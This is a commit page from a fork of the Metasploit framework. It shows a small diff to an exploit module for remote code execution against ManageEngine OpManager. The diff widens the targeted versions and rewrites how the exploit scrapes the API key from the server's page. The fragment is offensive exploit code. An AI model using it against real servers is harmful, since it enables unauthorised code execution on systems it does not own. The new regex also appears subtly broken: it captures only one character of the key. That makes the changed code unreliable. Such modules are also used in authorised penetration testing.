adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Updated with Egypt's suggestion, also changed the target name to include other versions

Browse Source
This commit is contained in:
Sara Perez
2017-04-27 13:19:44 +01:00
parent 178d68003e
commit 18fa411189
1 changed files with 2 additions and 8 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/exploits/windows/http/manage_engine_opmanager_rce.rb
+2 -8
View File
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Arch' => ARCH_JAVA,
'Targets' =>
[
['ManageEngine OpManager v11.6', {}]
['ManageEngine OpManager <= v11.6', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Sep 14 2015',
@@ -121,14 +121,8 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => redirect,
'method' => 'GET'
})
if res.body =~ /OpManager.*v\.([0-9]+\.[0-9]+)<\/span>/
version = $1
else
fail_with(Failure::Unknown, "#{peer} - Could not gather the version in use")
end
if res && res.code == 200 && ((version == 11.6 && res.body =~ /window.OPM.apiKey = "([a-z0-9]+)"/) || (version == 11.0 && res.body =~ /window.apiKey = "([a-z0-9]+)"/))
# the line above checks for the version, as for version 11.0 the call for the api key value is different but the rest of the exploit works the same.
if res && res.code == 200 && res.body =~ /window.(?:OPM.)?apiKey = "([a-z0-9])"/
api_key = $1
print_status("Retrieved API key [ #{api_key} ]")
else